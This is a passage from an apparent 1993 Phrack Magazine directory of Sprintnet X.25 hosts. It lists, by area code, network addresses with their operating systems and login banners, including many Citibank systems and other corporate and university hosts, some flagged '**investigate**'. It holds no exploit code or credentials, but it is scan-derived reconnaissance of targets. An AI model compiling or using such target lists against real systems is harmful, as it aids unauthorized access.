  6859. 216 209  *
  6860. 216 210  *
  6861. 216 211  *
  6862. 216 212  $ HP-3000
  6863. 216 530  *
  6864. 216 531  *
  6865. 216 532  *
  6866. 216 533  *
  6867. 216 534  *
  6868. 216 535  *
  6869. 216 536  *
  6870. 216 537  *
  6871. 216 538  *
  6872. 216 539  $             (echo)
  6873. 216 1351   Prime       PRIMENET 22.1.4 OPSPRO
  6874. 216 1352   Prime       Good morning
  6875. 216 1353   Prime       PRIMENET 22.1.4 OPSPRO
  6876. 216 1354   Prime       Good morning
  6877. 216 1355 $ Prime       PRIMENET 22.1.4.R63 OPSSEC
  6878. 216 1356 *
  6879. 216 1357   Prime       Good morning
  6880. 216 1358   Prime       PRIMENET 22.1.4 OPSPRO
  6881. 216 1369 *
  6882. 216 1370 *
  6883. 216 1371 *
  6884. 216 1372 *
  6885.  
  6886.  
  6887.  
  6888. 217  -  Illinois  Scanned: 0 - 200      
  6889.  
  6890. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6891. ---------- ----------- -------------------------------------------------
  6892. 217 45   *
  6893. 217 46   *
  6894.  
  6895.  
  6896.  
  6897.  
  6898. 219  -  Indiana  Scanned: 0 - 200    
  6899.  
  6900. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6901. ---------- ----------- -------------------------------------------------
  6902. 219 3      Prime       PRIMENET 22.1.0vA2 NODE.0
  6903. 219 8      Prime       PRIMENET 23.2.0vA NODE.8
  6904. 219 9                  ENTER GROUP NAME> 
  6905. 219 10                 Lincoln National Corporation
  6906. 219 35   $             MHP201A ZMA0PZ10  * VERSION 6.0.1 *.
  6907. 219 140    Prime       PRIMENET 23.2.0vA CS.FTW
  6908. 219 150  *
  6909.  
  6910.  
  6911.  
  6912. 222  -  unknown  Scanned: various      
  6913.  
  6914. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6915. ---------- ----------- -------------------------------------------------
  6916. 222 100    Prime
  6917. 222 140    Prime
  6918. 222 320    Prime
  6919. 222 340 
  6920.  
  6921.  
  6922.  
  6923.  
  6924. 223  -  Citibank  Scanned: various      
  6925.  
  6926. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  6927. ---------- ----------- -------------------------------------------------
  6928. 223 1    $ GS/1        CITITRUST/WIN Gateway!  (Toll 25 cents)
  6929. 223 6                  PLEASE ENTER TRANSACTION ID:
  6930. 223 10     Prime
  6931. 223 11     Prime
  6932. 223 13     Prime
  6933. 223 15     Prime
  6934. 223 17                 CDS DATA PROCESSING SUPPORT
  6935. 223 19   $ HP-3000
  6936. 223 26                 NETWORK USER VALIDATION.
  6937. 223 31
  6938. 223 32                 enter a for astra 
  6939. 223 34                 NETWORK USER VALIDATION.
  6940. 223 35     VAX/VMS     TREASURY PRODUCTS
  6941. 223 39     Major BBS   GALACTICOMM   User-ID? new
  6942. 223 40                 Global Report from Citicorp
  6943. 223 41     VOS         (other systems connect from there) 
  6944. 223 42                 CITICORP/CITIBANK - 0005,PORT 3
  6945. 223 46   $             Enter Secure Access ID -02-> 
  6946. 223 47                 CCMS
  6947. 223 48A                CITIBANK ,PORT 5
  6948. 223 50     Prime
  6949. 223 54                 CITI CASH MANAGEMENT NETWORK - 
  6950. 223 55                 NETWORK USER VALIDATION. 
  6951. 223 57   
  6952. 223 65     VOS
  6953. 223 68   $             Citimail II
  6954. 223 70                 ELECTRONIC CHECK MANAGER  ENTER 'ECM'
  6955. 223 71                            "" 
  6956. 223 74A                           ""
  6957. 223 79     VAX/VMS     Audit login ---  Your session will be recorded. 
  6958. 223 87     VOS         CitiShare Milwaukee, Wisconsin
  6959. 223 91     VAX/VMS     Unauthorized Use Is Prohibited
  6960. 223 92                 <<please enter logon>> 
  6961. 223 93     Major BBS?  Citibank Customer Delivery Systems (#95298116)
  6962. 223 94                 <<ENTER PASSWORD>>
  6963. 223 95
  6964. 223 96                 <<ENTER PASSWORD>>
  6965. 223 103                <<ENTER PASSWORD>>
  6966. 223 104  $ VAX/VMS
  6967. 223 106 
  6968. 223 175                enter a for astra 
  6969. 223 176    VAX/VMS
  6970. 223 178                NETWORK USER VALIDATION.
  6971. 223 179  $
  6972. 223 183    Prime
  6973. 223 184    Prime       PRIMENET 23.2.0vB PROD-C
  6974. 223 185                Citibank Hongkong
  6975. 223 186                Citibank Hongking
  6976. 223 187  $ DECserver
  6977. 223 188    GS/1        CITITRUST/WIN Gateway!  (Toll 25 cents) 
  6978. 223 189  $ DECserver
  6979. 223 191                (need x.citipc terminal emulator)
  6980. 223 193    Prime
  6981. 223 194    VAX/VMS
  6982. 223 199  $
  6983. 223 200                NETWORK USER VALIDATION.
  6984. 223 201                C/C/M INT'L 3    ENTER YOUR ID : [      ]
  6985. 223 202                C/C/M INT'L 4    ENTER YOUR ID : [      ]
  6986. 223 204                C/C/M INT'L 6    ENTER YOUR ID : [      ]
  6987. 223 208                C/C/M            ENTER YOUR ID : [      ]
  6988. 223 210                NETWORK USER VALIDATION.
  6989. 223 211                CITI Master Policy Bulletin Board
  6990. 223 212                            ""
  6991. 223 216    VAX/VMS     *** Unauthorized Access Prohibited ***
  6992. 223 217 
  6993. 223 218 
  6994. 223 222    Unix SysV   Citibank PDC Registration System 
  6995. 223 223                CITIBANK SINGAPORE 
  6996. 223 223    Unix        discovery login: 
  6997. 223 227    Prime       PRIMENET 23.2.0.R43 BASCOS
  6998. 223 234    VCP-1000    Terminal Server
  6999. 223 256    VOS         CITIBANK - NSO      NEW YORK, NY
  7000. 223 258    VOS         CITIBANK - NSO      NEW YORK, NY
  7001. 223 259    VOS         CITIBANK - NSO      NEW YORK, NY
  7002. 223 260    VAX/VMS     Unauthorized Use Is Prohibited
  7003. 223 503    ???         :
  7004. 223 508 
  7005. 223 510    VOS         Citibank Puerto Rico
  7006. 223 512    VAX/VMS     #6 Node: NYF050
  7007. 223 513                CITI CASH MANAGEMENT NETWORK - 
  7008. 223 515    Prime       PRIMENET 23.2.0.R43 BASCOS
  7009. 223 519    Prime       PRIMENET 23.2.0.R43 OBSPOM
  7010. 223 520  $             CitiMail II
  7011. 223 521  $ Major BBS   User-ID?                                 new
  7012. 223 523    Prime       PRIMENET 23.2.0.R43 LATPRI
  7013. 223 524  $ GS/1        Cititrust (Cayman)'s WIN Gateway!
  7014. 223 527                INVALID COMMAND SYNTAX
  7015. 223 600 
  7016. 223 1000               CITI CASH MANAGEMENT NETWORK 
  7017. 223 1002 
  7018. 223 3002               NETWORK USER VALIDATION.
  7019. 223 3003   ???         Welcome to Citiswitch, New York
  7020. 223 3008   ???                      ""
  7021. 223 3011   Unix        DG/UX Release 4.32. AViiON  (gnccsvr)
  7022. 223 3012   Unix        DG/UX Release 4.32. AViiON  (gnccsvr)
  7023. 223 3020   Prime
  7024. 223 3030 $ VAX/VMS
  7025. 223 3031 *
  7026. 223 3042A              CITI Master Policy Bulletin Board
  7027. 223 3044 
  7028. 223 3046 
  7029. 223 3048 $ DECserver
  7030. 223 3052   Unix        DG/UX Release 4.32. AViiON  (parsvr)
  7031. 223 3056 *
  7032. 223 3060B  TBBS        Citicorp Futures Corp.               
  7033. 223 3064 $
  7034. 223 3066 
  7035. 223 3067               NETWORK USER VALIDATION.
  7036. 223 3070 *
  7037. 223 3074               NETWORK USER VALIDATION.
  7038. 223 3075A  Port Selec  Systems: EQX/SUP,SECURID,TS,TS1,TS2,TS3,PBX
  7039. 223 3077 
  7040. 223 3080A              PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK.
  7041. 223 3082 
  7042. 223 3083               ENQUIRE       GSM User ID? 
  7043. 223 3086   VOS         Citishare
  7044. 223 3088   HP-3000     SYSTEMC.HP.CITIBANK
  7045. 223 4700 *
  7046. 223 8050               ILLEGAL SOURCE ADDRESS 0B 80
  7047. 223 8052
  7048. 223 8053               TYPE .
  7049. 223 8056               ILLEGAL SOURCE ADDRESS 0B 80
  7050. 223 8057 *
  7051. 223 8058               ILLEGAL SOURCE ADDRESS 0B 80
  7052. 223 8059               ILLEGAL SOURCE ADDRESS 0B 80
  7053. 223 8100   Prime       PRIMENET 23.1.0 LATRG1
  7054. 223 8101   Prime       PRIMENET 23.1.0 LATRG2
  7055. 223 8201
  7056. 223 8202               Enter password: 
  7057. 223 8602   Prime       PRIMENET 23.2.0.R43 OBSPOM
  7058. 223 8804               11 - FORMAT ERROR
  7059. 223 10009              I/P LOGIN CODE
  7060. 223 10010              I/P LOGIN CODE
  7061. 223 10015              I/P LOGIN CODE
  7062. 223 10030              UMP 15, TP (DEV A)  >
  7063. 223 10032              UMP 2,  XGATE (NODE 6)
  7064. 223 10050              I/P LOGIN CODE
  7065.  
  7066.  
  7067.  
  7068.  
  7069. Date:     Wed Mar 24, 1993  8:26 am  PST
  7070. From:     phrack
  7071.           EMS: INTERNET / MCI ID: 376-5414
  7072.           MBX: phrack@stormking.com
  7073.  
  7074. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  7075. TO:       Proctor & Associates / MCI ID: 399-1080
  7076. TO:       Peter Nesbitt / MCI ID: 511-1312
  7077. TO:     * Berton Corson / MCI ID: 528-0397
  7078. TO:       Michael W. Carroll / MCI ID: 557-1860
  7079. TO:       Michael McMahon / MCI ID: 585-7625
  7080. TO:       Multiple recipients of list
  7081.           EMS: INTERNET / MCI ID: 376-5414
  7082.           MBX: phrack@stormking.com
  7083. Subject:  Phrack 42/10-14
  7084.  
  7085.                           ==Phrack Magazine==
  7086.  
  7087.              Volume Four, Issue Forty-Two, File 10 of 14
  7088.  
  7089.                      <Sprintnet Directory Part 3>
  7090.  
  7091.  
  7092. 602  -  Arizona  Scanned: [0 - 300]      
  7093.  
  7094. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7095. ---------- ----------- ------------------------------------------------- 
  7096. 602 22   $             outdial?
  7097. 602 23   $             outdial?
  7098. 602 26   $             outdial (602)
  7099. 602 35   $             MSG 1: COMMAND INVALID FROM PHTIB010
  7100. 602 145  $             PSI Please enter our X.29 Password:
  7101. 602 148  *
  7102. 602 155.2  VAX/VMS     This is DTAC02 - VAX/VMS V5.5    
  7103. 602 165  *
  7104. 602 166 
  7105. 602 167  *
  7106.  
  7107.  
  7108.  
  7109.  
  7110. 603  -  New Hampshire  Scanned: [0 - 300]      
  7111.  
  7112. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7113. ---------- ----------- ------------------------------------------------- 
  7114. 603 20   $             Dartmouth College Time Sharing, D1
  7115. 603 31   $             outdial
  7116. 603 40   $             DTC01, IP 130.010.200.023
  7117. 603 46                 USER NUMBER--
  7118. 603 47   *
  7119. 603 60     VAX/VMS
  7120. 603 61                 **** Invalid sign-on, please try again ****
  7121. 603 62                 **** Invalid sign-on, please try again ****
  7122. 603 63                 **** Invalid sign-on, please try again ****
  7123. 603 68 
  7124. 603 135    VM/CMS      ENTERPRISE SYSTEMS ARCHITECTURE--ESA370
  7125. 603 136    VM/CMS      ENTERPRISE SYSTEMS ARCHITECTURE--ESA370 
  7126. 603 142  *
  7127.  
  7128.  
  7129.  
  7130.  
  7131. 609  -  New Jersey  Scanned: [0 - 500]      
  7132.  
  7133. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7134. ---------- ----------- ------------------------------------------------- 
  7135. 609 41                 WHAT SERVICE PLEASE????
  7136. 609 42                 WHAT SERVICE PLEASE????
  7137. 609 46                 WHAT SERVICE PLEASE????
  7138. 609 73   $ DTC         DTC01.DOMAIN.ORGANIZATION
  7139. 609 100    Prime
  7140. 609 120    Prime
  7141. 609 135  *
  7142. 609 138    Prime       PRIMENET 23.0.0 HCIONE
  7143. 609 170    Prime
  7144. 609 232  *
  7145. 609 235    VAX/VMS     TMA Information Services 
  7146. 609 238  *
  7147. 609 239  *
  7148. 609 242                WHAT SERVICE PLEASE????
  7149. 609 243                WHAT SERVICE PLEASE????
  7150. 609 244                WHAT SERVICE PLEASE????
  7151. 609 245  *
  7152. 609 246  *
  7153. 609 247  *
  7154. 609 259 
  7155.  
  7156.  
  7157.  
  7158.  
  7159. 611  -  unknown  Scanned: various     
  7160.  
  7161. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7162. ---------- ----------- ------------------------------------------------- 
  7163. 611 20 
  7164. 611 21 
  7165. 611 25                 ? (Transend?)
  7166. 611 26                 ?
  7167. 611 27                 ?
  7168. 611 28                 ?
  7169. 611 50                 SYSTEM AVAILABLE FOR YOUR USE
  7170. 611 55                 SYSTEM AVAILABLE FOR YOUR USE
  7171. 611 90     VAX/VMS     Username:
  7172. 611 120    VAX/VMS     Username: 
  7173. 611 192    Prime
  7174. 611 193    Prime
  7175. 611 194    Prime
  7176. 611 195    Prime
  7177. 611 230    VAX/VMS
  7178. 611 231    VAX/VMS
  7179. 611 232    VAX/VMS
  7180. 611 233    VAX/VMS
  7181. 611 234    AOS         MHCOMET System A  
  7182. 611 235    AOS         MHCOMET System B  
  7183. 611 236    AOS         MHCOMET System C
  7184. 611 238    AOS         MHCOMET System D 
  7185.  
  7186.  
  7187.  
  7188.  
  7189. 612  -  Minnesota  Scanned: [0 - 1000]      
  7190.  
  7191. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7192. ---------- ----------- ------------------------------------------------- 
  7193. 612 22   $             
  7194. 612 23                 Westlaw
  7195. 612 37                 Westlaw
  7196. 612 52   $ Prime       C>
  7197. 612 56                 Westlaw
  7198. 612 57                 Westlaw
  7199. 612 58                 Westlaw
  7200. 612 78   *
  7201. 612 79   *
  7202. 612 120  *
  7203. 612 121  *
  7204. 612 134  *
  7205. 612 135  *
  7206. 612 138  *
  7207. 612 158                Westlaw
  7208. 612 171  *
  7209. 612 236 
  7210. 612 240    GS/1        MSC X.25 Gateway
  7211. 612 241  *
  7212. 612 259    VAX/VMS     System LPCOMB - VAX/VMS V5.5-1  
  7213. 612 260  $ CDCNET      Control Data Arden Hills CDCNET Network **investigate**
  7214. 612 270                Westlaw
  7215. 612 271                Westlaw
  7216. 612 272                Westlaw
  7217. 612 273                Westlaw
  7218. 612 277                Password > 
  7219. 612 279                Westlaw
  7220. 612 353                ENTER ID  (Westlaw)
  7221. 612 362                Westlaw
  7222. 612 363                Westlaw
  7223. 612 364                Westlaw
  7224. 612 365                Westlaw
  7225. 612 366                Westlaw
  7226. 612 367                Westlaw
  7227. 612 368                Westlaw
  7228. 612 369                Westlaw
  7229. 612 385                Westlaw
  7230. 612 391                Westlaw
  7231. 612 393                Westlaw
  7232. 612 395                Westlaw
  7233. 612 395                Westlaw
  7234. 612 455  *
  7235. 612 456 
  7236. 612 457  *
  7237. 612 458  *
  7238. 612 460  *
  7239. 612 461  *
  7240. 612 462  *
  7241. 612 1030 *
  7242.  
  7243.  
  7244.  
  7245.  
  7246. 614  -  Ohio  Scanned: [0 - 300]      
  7247.  
  7248. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7249. ---------- ----------- ------------------------------------------------- 
  7250. 614 21                 STN International!  Enter x:
  7251. 614 22   $             outdial (614)
  7252. 614 23   $             outdial (614)
  7253. 614 31                 STN International!  Enter x:
  7254. 614 32                 STN International!  Enter x:
  7255. 614 34                 STN International!  Enter x:
  7256. 614 36   *
  7257. 614 65     Unix        all attempts monitored and reported
  7258. 614 140                STN International!  Enter x:
  7259. 614 145
  7260. 614 148A
  7261. 614 150A               MHP201A LPKMN001  APPLICATION:
  7262. 614 154A 
  7263. 614 155                User name?
  7264. 614 156                CONNECTED TO PACKET/94
  7265. 614 157  * 
  7266. 614 230    Port Selec? **investigate**
  7267.  
  7268.  
  7269.  
  7270.  
  7271. 617  -  Massachusetts  Scanned: 0 - 1500
  7272.  
  7273. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7274. ---------- ----------- -------------------------------------------------
  7275. 617 20     Prime       PRIMENET 23.3.0.R20 PBN27
  7276. 617 22     Prime       PRIMENET 22.0.0vA BDSD
  7277. 617 26   $             outdial (617)
  7278. 617 37     Prime       PRIMENET 23.3.0.R20 BDSH 
  7279. 617 47   $             ENTER ACCESS PASSWORD:
  7280. 617 48     VAX/VMS     Username:
  7281. 617 52     VAX/VMS     Username: 
  7282. 617 56   $             BEDPS:SCCHRV
  7283. 617 63     VM/CMS      IRI                     
  7284. 617 66     Prime       PRIMENET 23.3.0.R20 BDSK
  7285. 617 72     Prime       IRI System 2
  7286. 617 74     Prime       PRIMENET 23.3.0 ENB   
  7287. 617 78   *
  7288. 617 114  $ Prime       PRIMENET 23.2.0.R48 MD.B
  7289. 617 115  *
  7290. 617 136  $ DTC         DTCX25.BOS.WMC
  7291. 617 147  *
  7292. 617 149    VAX/VMS     Newton Headend Node MicroVAX (NWTNH2) 
  7293. 617 158    Prime       PRIMENET 23.2.0 BDSW  
  7294. 617 169    Prime       PRIMENET 22.0.0vA PBN36 
  7295. 617 178                Enter Application Request
  7296. 617 226    VM/CMS
  7297. 617 230  *
  7298. 617 234    Unix?       b1cs3!Username:
  7299. 617 235    VAX/VMS     Username:
  7300. 617 236    VAX/VMS     Username:
  7301. 617 237    Unix?       b1cs3!Username:
  7302. 617 250                ND X.29 Server - Press 'ESCAPE' to log in  
  7303. 617 255    Prime       PRIMENET 22.0.3vA PBN43 
  7304. 617 257  $ HP-3000
  7305. 617 270  $ VAX/VMS     COSMOS (CO6408)
  7306. 617 274  *
  7307. 617 279    Unix SysV   oa1cs1!x25 name:
  7308. 617 304    Prime       PRIMENET 23.3.0.R20 PBN67 
  7309. 617 306    Prime       PRIMENET 23.2.0 PBN53 
  7310. 617 308    Prime       PRIMENET 23.3.0.R20 PBN71 
  7311. 617 311  $             outdial (617)
  7312. 617 313  $             outdial (617)
  7313. 617 339  *
  7314. 617 340    VAX/VMS     FAXON
  7315. 617 341                Password: 
  7316. 617 346    VOS         STRATUS CUSTOMER ASSISTANCE CENTER
  7317. 617 348  *
  7318. 617 350    Prime       PRIMENET 23.2.0 PBN39 
  7319. 617 351    Prime       PRIMENET 22.0.0vA BDSU  
  7320. 617 373    VAX/VMS     FAXON
  7321. 617 379    ???         $$ 4200 MODEL:
  7322. 617 380    Prime       PRIMENET 22.1.4.R7 L01   
  7323. 617 381    Prime       PRIMENET 22.1.4.R7 P01   
  7324. 617 382    Prime       PRIMENET 22.1.4.R7 Y01   
  7325. 617 383    Prime       PRIMENET 22.1.4.R30 H02   
  7326. 617 384    Prime       PRIMENET 22.1.4.R7 V01   
  7327. 617 385    Prime       PRIMENET 22.1.4.R30 R01   
  7328. 617 387    Prime       PRIMENET 22.1.2.R22 B01   
  7329. 617 388    ???         $$ 4200 MODEL: 
  7330. 617 392    Prime       PRIMENET 22.1.4.R30 R04   
  7331. 617 393    Prime       PRIMENET 22.1.4.R7 Y04   
  7332. 617 397                U#=
  7333. 617 453    Prime       PRIMENET 22.0.3vA PBN35 
  7334. 617 454    Prime       PRIMENET 23.2.0 NORTON
  7335. 617 455    Prime       PRIMENET 23.3.r29.wg NER   
  7336. 617 457    Prime       PRIMENET 23.3.0 NNEB  
  7337. 617 458    Prime       PRIMENET 23.2.0.R32 CENTNE
  7338. 617 460  *
  7339. 617 474    Prime       PRIMENET 22.1.4 MD.FL1
  7340. 617 490    Prime       PRIMENET 23.3.0 ALBANY
  7341. 617 491    Prime       PRIMENET 23.2.0 CS    
  7342. 617 492    Prime       PRIMENET 23.0.0 FRMDLE
  7343. 617 493    Prime       PRIMENET 23.0.0 STMFRD
  7344. 617 498    Prime       PRIMENET 23.2.0 CS2NYC
  7345. 617 499    Prime       PRIMENET 23.2.0.R32 SYRA  
  7346. 617 502    Prime       PRIMENET 23.2.0 APPLE 
  7347. 617 516    Prime       PRIMENET 23.2.0.R39 PBN38 
  7348. 617 518    Prime       PRIMENET 23.2.0 PBN41
  7349. 617 519    Prime       PRIMENET 23.2.0.R39 PBN54 
  7350. 617 521    Prime       PRIMENET 22.0.3vA BDSG  
  7351. 617 530    ???         Maxlink International 
  7352. 617 534                dynapac: multi-pad.25
  7353. 617 541    Prime       PRIMENET 22.0.3vA BDSS  
  7354. 617 543    Prime       PRIMENET 22.0.3vA PBN33 
  7355. 617 551    Prime       PRIMENET 22.0.4.R7 CSP-A 
  7356. 617 553    Prime       PRIMENET 22.0.3vA BDSQ  
  7357. 617 555    Prime       PRIMENET 23.2.0 PBN72 
  7358. 617 558    Prime       PRIMENET 23.2.0.CSBETA2 CSSS.A
  7359. 617 560    Prime       PRIMENET 23.3.0.R20 BDSN  
  7360. 617 562    Prime       PRIMENET 22.1.4 BDSZ  
  7361. 617 563    Prime       LOGIN PLEASE (1)
  7362. 617 564    Prime       PRIMENET 22.0.3 MD.NE 
  7363. 617 575    Prime       PRIMENET 22.1.2 MF.NP1
  7364. 617 576    Prime       PRIMENET 22.0.1 B09   
  7365. 617 577    Prime       PRIMENET 22.1.1.R11 B30   
  7366. 617 578    Prime       PRIMENET 23.2.0.R3 SDSYSA
  7367. 617 583    Prime       PRIMENET 22.0.2 MD.HFD
  7368. 617 585    Prime       PRIMENET 23.2.0.R32 EDWIN 
  7369. 617 586    Prime       PRIMENET 23.2.0 BOSMET
  7370. 617 588  *
  7371. 617 589  *
  7372. 617 590  *
  7373. 617 593    Prime       PRIMENET 23.3.Beta2 BDSO  
  7374. 617 597    Prime       PRIMENET 22.0.3vA BDSB  
  7375. 617 641    AOS         Timeplace Inc.
  7376. 617 649                PaperChase
  7377. 617 654    Prime       IRI System 9
  7378. 617 710    Prime       PRIMENET 23.2.0 MD.ATL
  7379. 617 712    Prime       PRIMENET 23.3.0 PEANUT
  7380. 617 713    Prime       PRIMENET 23.3.0 PEACH 
  7381. 617 714    Prime       PRIMENET 23.3.0 NASH  
  7382. 617 715    Peime       PRIMENET 23.2.0 MD-BHM
  7383. 617 717    Prime       PRIMENET 23.1.0 ETHEL 
  7384. 617 719    Prime       PRIMENET 22.1.1.R11 PHILLY
  7385. 617 720    Prime       PRIMENET 22.1.2 CAMPHI
  7386. 617 723    Prime       PRIMENET 23.3.0 MD.NJ 
  7387. 617 724    Prime       PRIMENET 23.3.0 NYMCS 
  7388. 617 726    Prime       PRIMENET 23.3.0 NJCENT
  7389. 617 727    Prime       PRIMENET 22.0.1v NJPCS 
  7390. 617 750    Prime       PRIMENET 23.2.0 PBN75 
  7391. 617 752    Prime       PRIMENET 23.2.0 PBN68 
  7392. 617 850    Prime       PRIMENET 22.1.4 MD-CHI
  7393. 617 852    Prime       PRIMENET 23.3.0 CS-LP1
  7394. 617 853    Prime       PRIMENET 23.2.0 MD.SL1
  7395. 617 854    Prime       PRIMENET 23.2.0 MD.MKW
  7396. 617 855    Prime       PRIMENET 23.0.0 TRNGC 
  7397. 617 856    Prime       PRIMENET 23.2.0 CS-CHI
  7398. 617 857    Prime       PRIMENET 22.1.0 CS-OAK
  7399. 617 861    Prime       PRIMENET 22.1.3 PTCDET
  7400. 617 862    Prime       PRIMENET 23.3.0 DRBN1 
  7401. 617 863    Prime       PRIMENET 23.1.0 CSTROY
  7402. 617 864    Prime       PRIMENET 23.3.0 CS.DET
  7403. 617 865    Prime       PRIMENET 23.1.0 MD.DET
  7404. 617 868    Prime       PRIMENET 23.2.0 MD.GR 
  7405. 617 869    Prime       PRIMENET 22.1.1.R11 MD.CIN
  7406. 617 870    Prime       PRIMENET 23.2.0 CS.IND
  7407. 617 871    Prime       PRIMENET 22.1.3 MD.IND
  7408. 617 872    Prime       PRIMENET 23.2.0 MD-PIT
  7409. 617 874    Prime       PRIMENET 22.1.0 PITTCS
  7410. 617 875    Prime       PRIMENET 22.1.1.r35 MD-CLE
  7411. 617 902    Prime       PRIMENET 22.1.1.R11 MD.HOU
  7412. 617 908    Prime       PRIMENET 23.2.0 WMCS  
  7413. 617 910    Prime       PRIMENET 23.2.0 CSWDC 
  7414. 617 911    Prime       PRIMENET 23.2.0 VIENNA
  7415. 617 912    Prime       PRIMENET 23.2.0 BALT  
  7416. 617 915    Prime       PRIMENET 23.0.0 WDCRTS
  7417. 617 916    Prime       PRIMENET 23.0.0 CAP1  
  7418. 617 928    Prime       PRIMENET 23.3.0 CS.HOU
  7419. 617 930    Prime       PRIMENET 23.3.0 MD.AUS
  7420. 617 931    Prime       PRIMENET 23.3.0 CS-SCR
  7421. 617 932    Prime       PRIMENET 23.2.0.SCH CS.CS 
  7422. 617 936    Prime       PRIMENET 23.2.0 MD.DAL
  7423. 617 956    Prime       PRIMENET 22.1.0 RELAY 
  7424. 617 957    Prime       PRIMENET 22.1.3 ZULE  
  7425. 617 958    Prime       PRIMENET 23.1.0 EDOC1 
  7426. 617 962    Prime       PRIMENET 23.3.0.R20 PBN49 
  7427. 617 965    Prime       PRIMENET 22.0.3vA BDSE  
  7428. 617 966    Prime       PRIMENET 22.0.3vA BDST  
  7429. 617 978    Unix
  7430. 617 980    Prime       PRIMENET 22.1.1.R28 WUFPAK
  7431. 617 986
  7432. 617 991    Prime       PRIMENET 23.2.0 PBN64 
  7433. 617 995    Prime       PRIMENET 23.2.0.R3 ATC54 
  7434. 617 998    Prime       PRIMENET 23.0.0 TRNGB 
  7435. 617 1030 *
  7436. 617 1031 *
  7437. 617 1033 $             CONNECTED TO PACKET/94
  7438. 617 1035 $             T.S.S.G
  7439. 617 1054 $             Boston Safe Deposit and Trust Company
  7440. 617 1055   HP-3000     
  7441. 617 1075
  7442. 617 1099   Unix SysV   X.29 Terminal Service
  7443. 617 1202   Prime       PRIMENET 22.0.2 CSPLAN
  7444. 617 1204   Prime       PRIMENET 23.2.0 PBN70 
  7445. 617 1206   Prime       PRIMENET 23.2.0 PBN69 
  7446. 617 1207   Prime       PRIMENET 23.2.0 PBN73 
  7447. 617 1210   Prime       PRIMENET 23.2.0 PBN74 
  7448. 617 1211   Unix SysV                        
  7449. 617 1231               Primetec Leasing 
  7450. 617 1235   Prime       PRIMENET 23.2.0 PBN45 
  7451. 617 1260               dynapac: multi-pad.25
  7452. 617 1261               dynapac: multi-pad.25
  7453. 617 1262               dynapac: multi-pad.25
  7454. 617 1263               dynapac: multi-pad.25
  7455. 617 1264               dynapac: multi-pad.25
  7456. 617 1266               dynapac: multi-pad.25
  7457. 617 1267               dynapac: multi-pad.25
  7458. 617 1300   VAX/VMS     Username:
  7459. 617 1301   VAX/VMS     Username:
  7460. 617 1302               **** Invalid sign-on, please try again ****
  7461. 617 1303   VAX/VMS     Username: 
  7462. 617 1304               **** Invalid sign-on, please try again ****
  7463. 617 1305               **** Invalid sign-on, please try again ****
  7464. 617 1306               **** Invalid sign-on, please try again ****
  7465. 617 1307               **** Invalid sign-on, please try again ****
  7466. 617 1320   VAX/VMS     Username: 
  7467. 617 1321               **** Invalid sign-on, please try again ****
  7468. 617 1322               **** Invalid sign-on, please try again ****
  7469. 617 1323               **** Invalid sign-on, please try again ****
  7470. 617 1324               **** Invalid sign-on, please try again ****
  7471. 617 1331 *
  7472. 617 1333 *
  7473. 617 1334 *
  7474. 617 1335 *
  7475. 617 1336 *
  7476. 617 1337 *
  7477. 617 1338 *
  7478. 617 1339 *
  7479. 617 1340 *
  7480. 617 1341 *
  7481. 617 1350 *
  7482. 617 1351 *
  7483. 617 1355 *
  7484. 617 1356 *
  7485. 617 1365   VAX/VMS     Username: 
  7486. 617 1368   ???         Username(First Name):
  7487. 617 1371   VAX/VMS     Username:
  7488. 617 1379 *
  7489. 617 1441 *
  7490. 617 1442 *
  7491. 617 1455 *
  7492. 617 1456 *
  7493.  
  7494.  
  7495.  
  7496.  
  7497. 619  -  California  Scanned: 0 - 300
  7498.  
  7499. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7500. ---------- ----------- -------------------------------------------------
  7501. 619 38 
  7502. 619 41     VM/CMS
  7503. 619 51   *
  7504. 619 234  $ VAX/VMS     Hightower MicroVAX II (HIGHH1)
  7505. 619 258  *
  7506. 619 270  $ VAX/VMS     Daniels Headend Node MicroVAX 3100-80 (DANLH1)
  7507.  
  7508.  
  7509.  
  7510.  
  7511. 626  -  unknown  Scanned: [various]           
  7512.  
  7513. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7514. ---------- ----------- ------------------------------------------------- 
  7515. 626 1000 $ Prime
  7516. 626 1101 $ VAX/VMS     DEV2 
  7517. 626 1110 $ VAX/VMS     ANT1 
  7518. 626 1111 $ VAX/VMS     ANT2 
  7519. 626 1120 $ VAX/VMS     OAK1 
  7520. 626 1130 $ VAX/VMS     SRA1 
  7521. 626 1131 $ VAX/VMS     SRA2
  7522. 626 1160 $ VAX/VMS     SFD1
  7523. 626 2000 $ Prime
  7524.  
  7525.  
  7526.  
  7527.  
  7528. 669  -  unknown  Scanned: [various]      
  7529.  
  7530. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7531. ---------- ----------- ------------------------------------------------- 
  7532. 669 25   $             USER ID   
  7533. 669 50   $             USER ID   
  7534. 669 75   $             USER ID   
  7535.  
  7536.  
  7537.  
  7538.  
  7539. 703  -  Virginia  Scanned: [0 - 30]      
  7540.  
  7541. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7542. ---------- ----------- ------------------------------------------------- 
  7543. 703 40     VAX/VMS
  7544. 703 41     VAX/VMS
  7545. 703 44     AOS         Project HOPE
  7546. 703 55   *
  7547. 703 56   *
